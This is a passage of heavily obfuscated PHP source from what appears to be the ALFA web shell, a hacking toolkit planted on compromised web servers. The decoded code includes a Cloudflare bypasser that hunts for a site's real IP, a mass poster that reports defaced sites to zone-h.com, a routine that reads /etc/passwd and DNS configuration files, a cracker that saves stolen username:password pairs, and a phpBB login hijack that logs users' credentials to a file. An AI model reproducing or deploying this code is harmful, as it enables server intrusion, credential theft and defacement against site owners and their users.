(is_array($server)) { $server = $server[0]; } goto VIYH8; gRkuu: echo "\12\x5b\x2b\x5d\x20\106\151\156\151\163\150\x65\x64\x2e\12\x3c\x62\x72\x3e"; goto aY4ZB; jVHkh: echo "\x5b\x2b\x5d\x20\103\154\157\165\x64\106\x6c\x61\162\145\40\111\120\x3a\x20" . is_ipv4(gethostbyname($url)) . "\xa\xa\74\142\x72\x3e\x3c\x62\162\x3e"; goto wTXup; YhdOW: if (!preg_match("\x2f\136\50\x68\164\164\x70\x73\77\51\72\x5c\x2f\x5c\57\x28\167\173\63\x7d\174\167\x33\51\x5c\x2e\57\x69", $url)) { $url = preg_replace("\57\136\50\x68\164\164\x70\163\77\51\x3a\x5c\x2f\x5c\57\x2f", '', $url); $url = "\x68\x74\164\x70\72\57\x2f\167\x77\167\x2e" . $url; } goto k_NiK; k_NiK: $headers = @get_headers($url, 1); goto Id031; Wsfkc: $subs = array("\157\x77\141\x2e", "\62\164\x74\171\x2e", "\155\56", "\147\x77\56", "\155\x78\x31\x2e", "\x73\x74\157\x72\x65\x2e", "\61", "\x32", "\166\142\x2e", "\x6e\x65\167\x73\56", "\144\x6f\x77\x6e\154\x6f\141\x64\56", "\x76\x69\x64\145\x6f", "\x63\160\x61\156\x65\154\x2e", "\146\x74\x70\56", "\163\x65\162\x76\x65\x72\61\56", "\x63\x64\x6e\x2e", "\x63\x64\156\x32\x2e", "\156\x73\56", "\156\163\63\x2e", "\155\141\x69\154\x2e", "\x77\x65\x62\x6d\141\x69\154\56", "\x64\x69\x72\x65\143\x74\56", "\x64\x69\162\145\143\x74\x2d\143\x6f\156\156\x65\143\x74\x2e", "\x72\x65\143\157\162\144\x2e", "\163\163\154\x2e", "\x64\x6e\163\56", "\150\x65\154\160\x2e", "\x62\x6c\157\147\x2e", "\x69\x72\x63\x2e", "\146\x6f\x72\165\155\56", "\144\x6c\56", "\x6d\x79\56", "\143\x70\56", "\x70\x6f\x72\x74\141\x6c\x2e", "\x6b\142\x2e", "\x73\165\160\160\x6f\162\x74\56", "\163\x65\141\x72\x63\x68\x2e", "\x64\157\x63\163\56", "\146\151\154\145\x73\56", "\141\x63\143\x6f\165\x6e\x74\x73\56", "\x73\x65\143\165\x72\145\x2e", "\x72\x65\147\x69\x73\x74\x65\162\x2e", "\x61\160\x70\163\56", "\142\x65\x74\141\x2e", "\x64\145\155\157\56", "\x73\155\164\x70\56", "\x6e\163\62\56", "\x6e\163\x31\x2e", "\163\145\162\x76\145\x72\56", "\163\x68\x6f\x70\56", "\150\157\x73\164\56", "\x77\145\x62\56", "\x63\154\x6f\165\144\x2e", "\141\x70\151\x2e", "\x65\x78\x63\x68\x61\x6e\147\145\56", "\x61\x70\x70\x2e", "\166\160\163\56", "\157\167\141\56", "\x73\141\x74\x2e", "\x62\142\163\56", "\155\157\166\x69\145\56", "\x6d\x75\163\151\x63\x2e", "\141\162\164\56", "\146\x75\163\x69\x6f\156\x2e", "\155\141\160\x73\56", "\x66\157\x72\x75\155\163\x2e", "\141\x63\x63\56", "\143\x63\x2e", "\144\145\x76\56", "\167\x77\64\x32\56", "\167\151\153\151\x2e", "\143\154\x69\145\x6e\164\x73\x2e", "\143\x6c\x69\x65\156\x74\x2e", "\x62\x6f\x6f\153\163\56", "\141\156\163\167\145\162\x73\x2e", "\163\x65\162\x76\151\143\145\x2e", "\x67\x72\157\x75\160\163\56", "\151\x6d\x61\x67\145\163\x2e", "\x75\x70\x6c\157\x61\x64\x2e", "\165\160\x2e", "\164\x75\x62\x65\x2e", "\165\x73\145\x72\x73\x2e", "\141\x64\155\x69\156\x2e", "\141\x64\x6d\x69\x6e\151\x73\x74\162\x61\164\157\162\x2e", "\160\162\x69\x76\141\x74\x65\x2e", "\144\x65\163\x69\x67\x6e\56", "\167\150\x6d\143\163\56", "\x77\160\x2e", "\167\x6f\x72\144\x70\x72\x65\x73\x73\56", "\152\157\x6f\x6d\154\141\x2e", "\166\142\165\x6c\154\145\164\151\x6e\56", "\x74\x65\x73\164\56", "\144\145\x76\x65\x6c\x6f\x70\145\162\x2e", "\160\x61\x6e\x65\x6c\x2e", "\x63\x6f\x6e\164\x61\143\x74\56"); goto hWfBW; Id031: $server = $headers["\123\145\x72\166\x65\162"]; goto Wsfkc; aY4ZB: } goto WtWqY; qgw1X: alfafooter(); goto kDUM1; UKry5: AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); goto PTN1h; WtWqY: echo "\74\57\x64\x69\166\76"; goto qgw1X; PTN1h: echo "\x3c\x64\151\166\40\x63\154\x61\x73\163\x3d\x68\145\141\x64\x65\x72\x3e\74\x63\x65\x6e\x74\145\x72\x3e\x3c\x62\x72\x3e\74\144\151\x76\x20\143\x6c\141\163\163\75\x27\164\x78\164\x66\x6f\x6e\164\137\150\x65\141\x64\x65\x72\x27\x3e\x7c\40\x43\154\157\x75\x64\x20\106\x6c\141\162\145\x20\102\171\120\x61\x73\163\145\x72\x20\174\x3c\x2f\x64\151\x76\x3e\74\x62\162\x3e\x3c\x66\x6f\162\x6d\x20\141\x63\164\x69\157\x6e\x3d\x27\x27\40\157\156\163\x75\x62\x6d\151\164\x3d\42\x67\50\x27\x63\154\157\x75\x64\146\x6c\141\x72\145\x27\54\x6e\x75\x6c\x6c\x2c\x74\x68\151\x73\56\x75\x72\x6c\x2e\x76\141\154\x75\x65\x2c\x27\76\76\x27\x29\73\40\x72\145\164\165\162\x6e\40\146\x61\154\x73\145\x3b\x22\40\x6d\x65\164\x68\157\x64\75\47\160\157\163\164\47\76\15\12\x3c\160\76\x3c\x64\x69\166\x20\x63\154\x61\163\163\75\47\x74\170\x74\x66\157\156\x74\x27\x3e\x54\141\x72\x67\x65\164\x3a\x3c\x2f\x64\x69\x76\x3e\40\74\151\x6e\x70\x75\x74\40\x74\171\x70\x65\75\47\164\x65\170\164\47\40\163\151\172\x65\75\63\x30\40\x6e\141\x6d\145\x3d\47\x75\x72\154\x27\x20\x73\164\171\154\145\75\47\164\145\x78\x74\x2d\x61\154\x69\147\x6e\x3a\143\x65\x6e\164\x65\x72\x3b\47\x20\x70\x6c\141\143\x65\150\x6f\x6c\x64\145\162\75\x22\x74\x61\x72\x67\x65\x74\x2e\143\157\x6d\x22\76\40\x3c\x69\156\x70\x75\x74\40\x74\171\x70\x65\x3d\47\163\x75\142\155\x69\164\x27\40\156\141\x6d\x65\75\x27\x67\x6f\x27\40\166\141\x6c\165\x65\75\47\x20\x27\40\x2f\x3e\74\x2f\160\76\x3c\57\x66\157\162\x6d\76\74\57\x63\x65\156\164\x65\162\x3e"; goto NNO9V; ed6IX: alfahead(); goto UKry5; kDUM1: } goto MetfZ; gGXFd: if ($_POST["\141"] != "\x47\145\164\x50\141\164\150\110\x69\x73\x74\x6f\162\171") { if ($_SESSION[__LAST_CWD__] != $_POST["\143"]) { $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__]; } } goto PDb5Q; bdXxs: function __pre() { return "\74\x70\162\145\40\151\144\x3d\42\163\164\162\117\165\x74\x70\165\164\42\40\x73\x74\171\154\x65\x3d\42\155\141\x72\147\151\156\55\164\x6f\x70\x3a\x35\x70\x78\x22\x20\143\154\141\x73\163\75\42\x6d\x6c\61\x22\x3e"; } goto LowdX; a8cEH: function alfaPermsColor($f, $isbash = false) { goto LLiLv; yHXZ1: $num = ''; goto ADSvQ; N5oFG: if ($isbash) { goto G2d4m; G2d4m: $class = $f["\x63\154\141\x73\163"]; goto A7Ndv; V5JWg: $human = $f["\150\x75\x6d\141\x6e"]; goto b5BPO; A7Ndv: $num = $f["\156\x75\155"]; goto V5JWg; b5BPO: } else { goto y4w8X; C66xs: $human = alfaPerms(@fileperms($f)); goto wgbIP; y4w8X: $num = substr(sprintf("\x25\x6f", @fileperms($f)), -4); goto C66xs; wgbIP: if (!@is_readable($f)) { $class = "\155\141\x69\156\137\x72\145\x64\137\x70\145\162\x6d"; } elseif (!@is_writable($f)) { $class = "\x6d\x61\x69\x6e\137\167\x68\x69\x74\145\x5f\x70\145\162\155"; } else { $class = "\155\x61\151\x6e\137\x67\162\145\145\x6e\137\x70\145\x72\155"; } goto BhU90; BhU90: } goto VwDqC; LLiLv: $class = ''; goto yHXZ1; ADSvQ: $human = ''; goto N5oFG; VwDqC: return "\x3c\163\160\141\x6e\x20\x73\164\171\x6c\145\75\x22\146\x6f\x6e\x74\55\x77\x65\x69\147\x68\x74\x3a\x75\156\163\x65\x74\73\42\40\143\154\x61\163\x73\75\x22" . $class . "\42\76" . $num . "\x3c\x2f\163\x70\x61\156\76\x3c\x73\160\x61\x6e\40\x73\164\x79\x6c\x65\x3d\42\146\157\x6e\164\55\x77\145\151\147\x68\x74\72\x75\156\163\x65\164\73\x22\40\x63\x6c\x61\163\x73\x3d\42\x62\x65\145\164\167\145\x65\x6e\137\x70\145\162\155\163\42\x3e\x20\76\76\40\x3c\57\163\x70\x61\156\x3e\x3c\163\x70\x61\x6e\x20\163\x74\171\154\x65\x3d\42\146\x6f\156\164\55\167\x65\x69\147\x68\164\72\165\x6e\163\145\x74\x3b\x22\40\143\154\x61\163\163\75\42" . $class . "\x22\76" . $human . "\74\57\x73\x70\141\x6e\76"; goto KJX89; KJX89: } goto lG0uK; i967k: $GLOBALS["\x68\157\x6d\x65\x5f\x63\x77\144"] = @getcwd(); goto gGXFd; ZDeKS: function CrackerResualt($info) { goto Wifaq; QVBbl: @fwrite($c, $res); goto wZatZ; wZatZ: @fclose($c); goto TCctu; Wifaq: $res = $info["\x74\x61\x72\x67\145\164"] . "\40\75\x3e\x20" . $info["\x75\163\x65\162\156\x61\155\145"] . "\x3a" . $info["\x70\141\163\163\167\x6f\x72\144"] . "\xa"; goto KDpYE; KDpYE: $c = @fopen($info["\146\143\x72\x61\143\x6b"], "\x61\53"); goto QVBbl; TCctu: } goto jF6QH; kxiel: function alfaWhich($p) { goto iSiZa; Qiukx: if (!empty($path)) { return strlen($path); } goto B8Pb2; B8Pb2: return false; goto eP16w; iSiZa: $path = alfaEx("\x77\150\x69\x63\x68\40" . $p, false, false); goto Qiukx; eP16w: } goto NIscI; B1TDg: function alfazoneh() { goto yok4F; OZlwP: foreach ($hackmode as $mode) { echo "\x3c\x6f\160\x74\x69\157\156\x20\x73\x74\x79\154\145\x3d\42\142\141\143\153\x67\x72\157\165\156\x64\55\143\x6f\x6c\x6f\x72\x3a\x20\162\147\142\50\x46\x2c\x20\x46\54\40\x46\51\73\x22\40\166\x61\154\165\145\75\x22" . $x . "\x22\76" . $mode . "\x3c\57\157\x70\164\x69\x6f\x6e\76"; $x++; } goto wC_Pz; oTIWz: $x = 1; goto OZlwP; Ijp5w: echo "\74\57\144\151\x76\76"; goto Ez95R; QV477: $x = 1; goto Ekwl3; yok4F: alfahead(); goto TrQfm; Ekwl3: foreach ($reason as $mode) { echo "\74\157\x70\164\x69\x6f\x6e\x20\x73\164\x79\x6c\x65\x3d\42\142\141\x63\x6b\x67\162\x6f\165\156\x64\x2d\x63\157\154\157\x72\x3a\x20\162\147\142\50\106\54\40\106\x2c\40\x46\x29\x3b\x22\x20\x76\141\x6c\165\x65\x3d\42" . $x . "\42\x3e" . $mode . "\74\57\x6f\x70\x74\x69\x6f\x6e\x3e"; $x++; } goto feGyS; tFqWl: if (!function_exists("\143\x75\162\x6c\137\x76\x65\162\x73\151\157\x6e")) { echo "\74\x70\162\x65\40\143\x6c\x61\x73\163\x3d\x6d\x6c\61\40\163\164\x79\154\145\x3d\x27\x6d\141\x72\x67\151\156\55\x74\x6f\x70\72\x35\160\x78\x27\x3e\x3c\x63\145\x6e\164\x65\162\76\74\146\x6f\156\x74\40\x63\157\154\157\162\x3d\162\x65\144\76\74\142\x3e\x3c\142\x69\x67\x3e\74\x62\x69\147\76\x50\x48\120\x20\103\125\x52\114\x20\116\x4f\x54\x20\105\130\111\123\124\x20\176\40\132\117\x4e\x45\40\x48\x20\x4d\x41\x53\x53\x20\120\x4f\123\124\x45\x52\40\104\117\x45\123\x20\x4e\117\124\x20\127\117\122\113\74\57\142\x3e\x3c\x2f\x66\157\x6e\164\76\74\57\x62\151\x67\76\74\x2f\x62\x69\x67\x3e\74\x2f\143\x65\156\164\x65\x72\x3e\x3c\x2f\x70\x72\145\76"; } goto sUmVS; vbkDB: $reason = array("\110\145\150\56\x2e\x2e\152\x75\x73\164\x20\x66\157\x72\40\146\x75\x6e\41", "\122\x65\x76\x65\x6e\x67\x65\x20\x61\x67\x61\x69\156\163\x74\40\164\150\x61\x74\x20\x77\145\142\163\x69\x74\145", "\x50\x6f\x6c\x69\x74\151\x63\141\x6c\x20\162\145\x61\x73\x6f\x6e\163", "\101\163\x20\x61\x20\143\x68\141\154\154\145\156\147\x65", "\x49\x20\x6a\x75\163\164\x20\x77\x61\x6e\164\x20\164\157\x20\142\x65\40\164\150\145\x20\142\145\163\x74\40\144\145\146\x61\x63\145\x72", "\120\x61\164\162\151\157\x74\x69\x73\155", "\x4e\x6f\164\40\141\166\x61\x69\154\141\142\154\145"); goto zx1FF; zx1FF: echo "\15\12\x3c\x63\x65\156\164\145\162\x3e\74\142\x72\76\x3c\x64\151\166\40\x63\154\141\x73\x73\x3d\x22\x74\170\164\146\157\156\164\137\150\145\x61\144\x65\162\42\x3e\174\x20\x5a\x6f\x6e\x65\55\x68\40\x4d\x61\x73\163\40\x50\x6f\163\x74\145\x72\x20\174\x3c\x2f\x64\151\x76\76\x3c\143\x65\156\164\x65\x72\76\74\x62\x72\76\15\xa\x3c\146\x6f\162\x6d\40\x61\x63\x74\x69\157\x6e\x3d\42\42\40\x6d\x65\164\150\157\x64\75\x22\160\157\x73\x74\42\x20\157\x6e\x73\165\x62\155\x69\164\x3d\x22\147\x28\47\x7a\157\156\145\x68\47\x2c\156\165\x6c\154\54\x74\x68\151\x73\56\x64\x65\146\x61\143\145\162\x2e\166\x61\x6c\165\145\x2c\164\150\x69\163\x2e\x68\x61\143\x6b\155\157\x64\145\56\x76\x61\154\x75\145\x2c\x74\150\x69\163\x2e\x72\145\x61\163\x6f\156\56\166\141\x6c\165\x65\54\x74\x68\151\x73\x2e\x64\157\155\x61\151\x6e\x2e\x76\141\154\165\x65\54\x27\x3e\76\x27\x29\73\40\x72\145\164\165\x72\156\40\x66\x61\154\x73\x65\73\42\76\xd\xa\x3c\x69\156\x70\165\164\40\164\171\x70\x65\75\42\x74\145\170\x74\42\40\x6e\141\x6d\145\x3d\x22\144\x65\146\141\x63\x65\x72\42\x20\163\x69\172\145\75\x22\x36\x37\42\40\x69\144\75\42\164\x65\170\x74\42\x20\160\x6c\141\143\x65\150\157\154\x64\145\x72\x3d\x22\x41\x4c\106\x41\40\x54\x45\141\115\40\x32\60\61\62\x22\40\x2f\x3e\15\xa\x3c\142\x72\76\xd\12\74\163\x65\x6c\145\143\x74\40\x69\x64\x3d\x22\164\x65\170\x74\42\x20\156\141\155\x65\x3d\42\x68\x61\x63\153\155\157\x64\145\42\x20\163\x74\x79\x6c\x65\x3d\42\x77\x69\144\164\150\72\64\60\60\160\x78\x3b\x22\76"; goto oTIWz; IK_VR: if ($_POST["\x61\154\146\x61\x35"] && $_POST["\141\x6c\x66\141\x35"] == "\76\x3e") { goto yfBrU; rIulM: while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "\x68\x74\x74\x70") { $sites[$i] = "\x68\164\x74\x70\x3a\57\57" . $sites[$i]; } $alfa->Send("\x68\x74\x74\160\x3a\57\x2f\x77\167\x77\56\172\157\156\145\x2d\x68\56\143\157\155\x2f\x6e\x6f\164\x69\x66\x79\57\163\151\156\x67\154\145", "\160\x6f\163\x74", "\x64\x65\146\x61\143\x65\162\75" . $hacker . "\x26\144\x6f\155\141\x69\156\61\75" . $sites[$i] . "\x26\x68\141\x63\x6b\155\157\x64\x65\x3d" . $method . "\x26\x72\145\141\x73\157\156\x3d" . $neden); ++$i; } goto e21r_; e21r_: echo __pre() . "\x3c\143\145\x6e\x74\x65\x72\x3e\x3c\x66\157\x6e\x74\40\x63\x6f\154\157\x72\x20\75\x22\x23\60\x30\101\x32\62\x30\x22\76\74\x62\x3e\133\53\x5d\x20\123\145\x6e\x64\x69\x6e\x67\40\123\x69\164\x65\x73\40\x54\x6f\40\132\157\x6e\145\x2d\x48\40\x48\141\163\40\x42\145\x65\156\40\x43\x6f\x6d\160\x6c\x65\x74\x65\144\x20\x53\165\x63\x63\x65\x73\163\x66\x75\154\154\x79\40\x21\41\x21\133\53\x5d\74\x2f\142\76\74\146\157\x6e\x74\76\x3c\57\143\145\x6e\x74\x65\x72\x3e"; goto Q1xBS; riW9_: $neden = $_POST["\x61\154\x66\x61\63"]; goto t3U4e; fZceI: $alfa = new AlfaCURL(); goto rIulM; hESxW: $method = $_POST["\x61\x6c\146\x61\x32"]; goto riW9_; sbw_2: $sites = explode("\12", $site); goto fZceI; yfBrU: ob_start(); goto HkgzF; mEhd3: if (empty($hacker)) { die(__pre() . "\x3c\x63\x65\x6e\x74\x65\162\76\74\x62\76\74\x66\x6f\156\164\x20\x63\x6f\x6c\x6f\x72\x20\x3d\42\43\106\106\60\x30\60\60\42\76\x5b\53\x5d\x20\x59\117\125\x20\115\x55\123\x54\x20\106\111\x4c\x4c\40\124\110\x45\x20\101\x54\124\x41\x43\x4b\x45\122\40\116\101\115\x45\40\x5b\x2b\x5d\74\57\x66\157\x6e\164\76\x3c\57\142\76\74\57\143\x65\x6e\x74\145\162\76"); } elseif ($method == "\x2d\55\x2d\x2d\55\55\x2d\55\55\x2d\55\x2d\55\55\x2d\55\55\55\x2d\55\55\x2d\55\x2d\55\55\55\x2d\55\x2d\x2d\55\55\x2d\55\x2d\x53\105\x4c\105\x43\x54\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\55\55\x2d\55\55\55") { die(__pre() . "\x3c\x63\145\156\164\x65\x72\x3e\74\x62\x3e\x3c\x66\x6f\156\164\x20\143\x6f\154\157\x72\x20\75\42\43\106\x46\60\x30\60\60\42\x3e\x5b\53\x5d\40\x59\117\125\40\x4d\125\123\x54\x20\x53\x45\x4c\105\103\x54\40\x54\110\x45\x20\x4d\x45\124\110\x4f\104\x20\133\53\x5d\x3c\57\142\x3e\74\x2f\x66\157\x6e\164\x3e\74\57\x63\145\156\164\x65\x72\76"); } elseif ($neden == "\x2d\55\55\55\x2d\55\55\55\55\55\55\55\x2d\55\55\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\55\55\x2d\55\55\55\55\x2d\55\55\x2d\55\55\123\105\x4c\105\x43\124\55\x2d\55\x2d\x2d\x2d\55\55\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\55\x2d\55\x2d\55\55\55") { die(__pre() . "\74\143\x65\x6e\164\x65\162\x3e\74\142\x3e\74\146\157\156\164\x20\x63\x6f\x6c\157\162\x20\x3d\x22\x23\106\106\x30\x30\x30\60\x22\x3e\133\x2b\x5d\40\131\x4f\x55\40\x4d\125\123\124\40\123\x45\114\105\103\x54\40\x54\x48\105\40\x52\x45\x41\123\x4f\x4e\40\x5b\53\x5d\x3c\57\x62\76\x3c\x2f\x66\x6f\x6e\164\76\x3c\57\143\x65\156\x74\x65\x72\76"); } elseif (empty($site)) { die(__pre() . "\74\x63\145\x6e\x74\x65\162\x3e\74\x62\76\x3c\x66\x6f\x6e\164\40\x63\x6f\x6c\x6f\162\40\75\x22\43\x46\x46\60\x30\x30\60\x22\76\133\53\x5d\x20\131\117\125\40\115\125\x53\124\40\x49\x4e\124\x45\122\x20\x54\110\105\x20\x53\111\124\105\x53\x20\114\111\x53\x54\40\133\53\x5d\x3c\x66\157\156\x74\x3e\74\57\x62\x3e\x3c\x2f\143\x65\x6e\x74\145\162\x3e"); } goto rj02j; t3U4e: $site = $_POST["\141\154\146\x61\64"]; goto mEhd3; HkgzF: $hacker = $_POST["\x61\x6c\x66\141\61"]; goto hESxW; rj02j: $i = 0; goto sbw_2; Q1xBS: } goto Ijp5w; wC_Pz: echo "\x3c\x2f\163\145\154\x65\x63\164\76\x3c\142\x72\76\x3c\x73\145\154\145\143\x74\40\151\144\75\42\164\x65\x78\x74\42\x20\x6e\141\x6d\x65\x3d\x22\x72\145\141\163\x6f\156\42\x20\163\164\x79\154\145\x3d\x22\167\x69\x64\164\x68\72\62\x30\x30\160\x78\x3b\42\76"; goto QV477; TrQfm: echo "\74\144\151\x76\x20\x63\154\141\163\163\75\x68\145\x61\x64\x65\x72\76"; goto tFqWl; sUmVS: $hackmode = array("\153\x6e\157\167\156\x20\x76\x75\154\x6e\145\162\141\142\151\154\x69\x74\171\40\50\x69\56\x65\x2e\x20\165\x6e\x70\141\164\x63\150\x65\x64\x20\x73\x79\x73\164\145\x6d\x29", "\165\156\144\x69\163\143\154\x6f\x73\145\144\x20\x28\156\x65\167\51\40\x76\165\x6c\x6e\145\x72\141\142\x69\154\151\x74\171", "\143\157\x6e\x66\x69\x67\165\162\141\x74\x69\x6f\x6e\x20\x2f\40\x61\x64\155\151\x6e\56\x20\x6d\151\163\x74\141\153\x65", "\142\x72\165\x74\x65\x20\x66\157\162\143\145\40\141\x74\164\x61\x63\x6b", "\x73\x6f\143\x69\141\x6c\40\145\x6e\147\x69\x6e\x65\x65\162\151\156\147", "\x57\145\142\x20\x53\x65\162\x76\x65\x72\40\x69\x6e\x74\x72\165\x73\x69\157\x6e", "\x57\x65\x62\x20\x53\145\x72\166\145\x72\40\x65\170\x74\x65\x72\156\141\x6c\40\x6d\x6f\144\x75\154\x65\40\x69\156\x74\162\165\x73\151\157\x6e", "\115\x61\x69\154\40\x53\145\162\x76\x65\x72\40\x69\x6e\164\162\165\x73\x69\157\x6e", "\x46\124\120\40\x53\x65\162\166\145\x72\40\x69\x6e\x74\162\x75\x73\x69\157\156", "\x53\123\x48\x20\x53\x65\162\166\145\x72\x20\x69\156\x74\x72\x75\x73\151\x6f\156", "\124\145\x6c\156\145\x74\x20\x53\145\x72\166\x65\162\40\x69\156\164\162\x75\163\151\157\156", "\x52\120\103\40\123\x65\x72\x76\x65\162\x20\x69\156\164\162\165\163\x69\x6f\156", "\x53\150\141\x72\145\x73\x20\155\x69\x73\143\x6f\156\x66\x69\147\x75\x72\141\x74\x69\157\156", "\117\164\x68\x65\x72\x20\x53\x65\162\166\x65\x72\x20\x69\x6e\x74\x72\165\x73\151\157\x6e", "\123\121\114\40\x49\156\152\145\x63\164\151\157\x6e", "\125\122\x4c\40\x50\157\151\x73\157\x6e\x69\x6e\x67", "\x46\x69\154\145\x20\111\156\x63\x6c\165\x73\151\x6f\156", "\x4f\164\150\x65\x72\x20\x57\x65\142\40\x41\x70\160\154\151\143\x61\x74\151\157\x6e\40\x62\x75\147", "\122\x65\x6d\x6f\164\145\40\x61\x64\155\151\156\x69\163\164\162\x61\x74\151\166\145\40\160\x61\156\145\x6c\40\x61\143\x63\145\163\163\x20\142\x72\x75\x74\x65\146\x6f\x72\x63\x69\156\147", "\x52\x65\155\x6f\164\145\x20\x61\144\155\x69\x6e\x69\163\164\x72\141\x74\151\x76\145\x20\x70\141\156\x65\x6c\x20\x61\x63\143\145\x73\x73\x20\160\x61\163\163\x77\157\x72\144\x20\147\165\x65\x73\x73\151\156\147", "\x52\x65\x6d\157\x74\x65\40\141\144\155\151\156\x69\x73\x74\x72\x61\x74\151\x76\x65\40\x70\141\x6e\145\x6c\40\141\x63\x63\145\x73\163\40\x73\157\143\151\x61\x6c\40\145\x6e\x67\151\x6e\x65\x65\162\151\x6e\147", "\101\x74\x74\141\143\153\40\141\147\141\x69\156\163\x74\x20\x61\x64\x6d\x69\x6e\x69\163\164\x72\141\x74\x6f\162\50\160\141\x73\163\167\x6f\x72\x64\40\163\x74\x65\x61\x6c\151\156\x67\x2f\x73\156\x69\x66\146\151\x6e\x67\51", "\101\143\x63\x65\x73\x73\x20\x63\162\145\144\x65\x6e\164\x69\141\154\163\40\164\x68\x72\x6f\165\x67\150\40\x4d\141\x6e\x20\x49\156\40\164\150\x65\x20\115\x69\x64\144\154\x65\40\x61\x74\x74\141\x63\153", "\x52\x65\x6d\157\x74\145\x20\x73\x65\162\166\151\x63\145\x20\160\141\x73\163\x77\157\162\x64\x20\147\165\145\163\x73\x69\156\x67", "\122\145\x6d\157\x74\145\40\163\x65\x72\x76\x69\x63\x65\40\x70\x61\x73\163\x77\157\x72\144\40\x62\x72\x75\164\145\146\x6f\x72\x63\145", "\122\145\x72\157\165\164\151\156\x67\x20\141\146\x74\x65\162\40\141\164\164\x61\143\x6b\151\156\x67\x20\164\150\x65\40\x46\151\x72\x65\x77\x61\x6c\x6c", "\x52\x65\162\157\165\x74\x69\156\x67\40\x61\x66\x74\x65\x72\40\141\x74\164\x61\143\x6b\x69\x6e\x67\x20\x74\x68\x65\40\x52\157\165\164\x65\x72", "\x44\x4e\x53\40\x61\x74\164\x61\143\x6b\40\x74\x68\x72\157\165\147\150\40\163\x6f\143\x69\x61\x6c\x20\145\156\147\x69\x6e\x65\x65\162\x69\156\x67", "\104\116\x53\x20\141\x74\x74\141\x63\153\40\x74\x68\162\157\165\147\150\40\143\141\x63\x68\x65\x20\160\x6f\151\163\157\x6e\x69\x6e\x67", "\116\x6f\164\x20\141\166\x61\x69\154\141\142\154\145", "\x43\162\157\x73\163\x2d\123\151\x74\145\40\123\x63\x72\x69\160\x74\x69\156\x67"); goto vbkDB; feGyS: echo "\74\57\163\145\154\x65\143\x74\x3e\74\x62\162\x3e\xd\12\74\164\x65\170\164\141\x72\145\x61\x20\x6e\x61\x6d\x65\75\42\x64\157\x6d\141\x69\x6e\42\40\x63\157\154\163\75\42\x39\x30\x22\40\x72\157\167\x73\x3d\42\62\60\42\x20\x70\x6c\x61\x63\x65\x68\157\x6c\144\145\162\x3d\42\104\x6f\x6d\141\x69\156\163\x2e\56\56\x22\76\74\x2f\164\145\x78\164\x61\162\145\141\x3e\x3c\142\x72\76\15\12\x3c\160\76\x3c\151\x6e\160\x75\x74\x20\x74\171\x70\x65\x3d\42\163\x75\142\155\151\164\x22\40\166\x61\x6c\165\x65\x3d\42\40\42\40\x6e\x61\x6d\x65\x3d\42\147\157\42\x20\57\76\74\57\x70\76\xd\xa\x3c\57\146\x6f\162\155\x3e\74\57\143\x65\156\x74\145\162\76"; goto IK_VR; Ez95R: alfafooter(); goto ad80J; ad80J: } goto uM4l3; hg5T3: function __alert($s) { echo "\74\143\x65\x6e\x74\145\162\76" . __pre() . $s . "\x3c\x2f\x63\x65\156\164\x65\x72\76"; } goto IBuaD; XBe80: function alfaGetDomains($state = false) { goto j761M; j761M: $state = "\156\141\x6d\x65\144\x2e\143\157\156\x66"; goto HBsel; cVK7l: return array("\x6c\151\x6e\145\163" => $lines, "\163\164\141\164\145" => $state); goto HIQwf; Y2Cxd: $lines = _alfa_file("\57\145\164\x63\x2f\x6e\141\x6d\x65\x64\x2e\x63\x6f\x6e\x66"); goto FL37k; FL37k: if (!$lines) { goto krXDj; krXDj: $lines = @scandir("\57\145\x74\143\57\166\141\154\151\x61\x73\145\x73\57"); goto Wltd6; Wltd6: $state = "\x76\141\x6c\x69\x61\163\145\163"; goto bxqMo; bxqMo: if (!$lines) { goto l12Md; l12Md: $lines = @scandir("\57\x76\x61\x72\x2f\x6e\141\x6d\145\144"); goto FnwTZ; FnwTZ: $state = "\x6e\x61\155\145\x64"; goto vHZ2S; vHZ2S: if (!$lines && $state) { $lines = _alfa_file("\57\145\164\143\57\160\141\x73\x73\167\x64"); $state = "\160\x61\163\x73\x77\x64"; } goto Wmx3l; Wmx3l: } goto VdQaZ; VdQaZ: } goto cVK7l; HBsel: $lines = array(); goto Y2Cxd; HIQwf: } goto e_w5I; kOVkY: function hijackPHPBB($path, $saveto) { goto nFRVU; kBB7a: $find = "\143\141\x73\145\40\x27\x6c\x6f\147\x69\156\x27\x3a"; goto i0xJb; i0xJb: $code = str_replace("\x7b\163\x61\x76\x65\164\x6f\137\160\x61\x74\150\175", $saveto, $code); goto YvBaB; RnJWA: $evil_login = "\11" . $find . "\12\x9" . $code; goto AkKmw; nFRVU: $code = "\44\x41\x6c\x66\x61\137\165\40\x3d\x20\162\145\x71\x75\x65\x73\x74\137\166\141\x72\x28\x27\x75\x73\x65\162\156\x61\x6d\145\47\54\40\47\x27\51\73\44\101\x6c\146\x61\x5f\160\x20\x3d\40\x72\145\161\x75\x65\x73\x74\x5f\x76\x61\162\50\x27\160\141\163\163\167\157\162\144\47\54\x20\47\x27\x29\73\x69\x66\50\44\101\x6c\x66\141\137\x75\x20\41\x3d\40\47\47\40\x41\116\x44\40\x24\101\x6c\x66\141\x5f\x70\x20\41\75\40\47\47\51\x7b\x24\101\154\146\x61\x5f\162\x65\163\x70\x6f\156\x73\145\x20\75\x20\x24\141\165\x74\150\x2d\x3e\x6c\157\147\151\x6e\50\x24\101\x6c\146\x61\137\x75\54\44\x41\x6c\146\141\x5f\x70\51\73\x69\146\50\44\101\154\146\x61\137\162\x65\163\x70\x6f\156\x73\145\133\x27\163\164\x61\x74\165\163\x27\135\40\75\75\40\114\x4f\x47\111\x4e\x5f\123\125\103\x43\105\x53\x53\x29\173\x24\x41\154\x66\141\137\146\x69\x6c\145\40\75\42\173\x73\x61\x76\x65\164\157\x5f\160\141\x74\x68\x7d\42\73\44\146\x70\x20\75\x20\100\x66\157\160\145\156\50\x24\101\154\146\x61\137\x66\151\x6c\x65\54\40\42\141\53\42\x29\x3b\x40\x66\x77\x72\151\164\x65\50\44\146\160\54\40\44\x41\x6c\x66\x61\137\165\56\x22\40\x3a\40\42\56\44\x41\x6c\14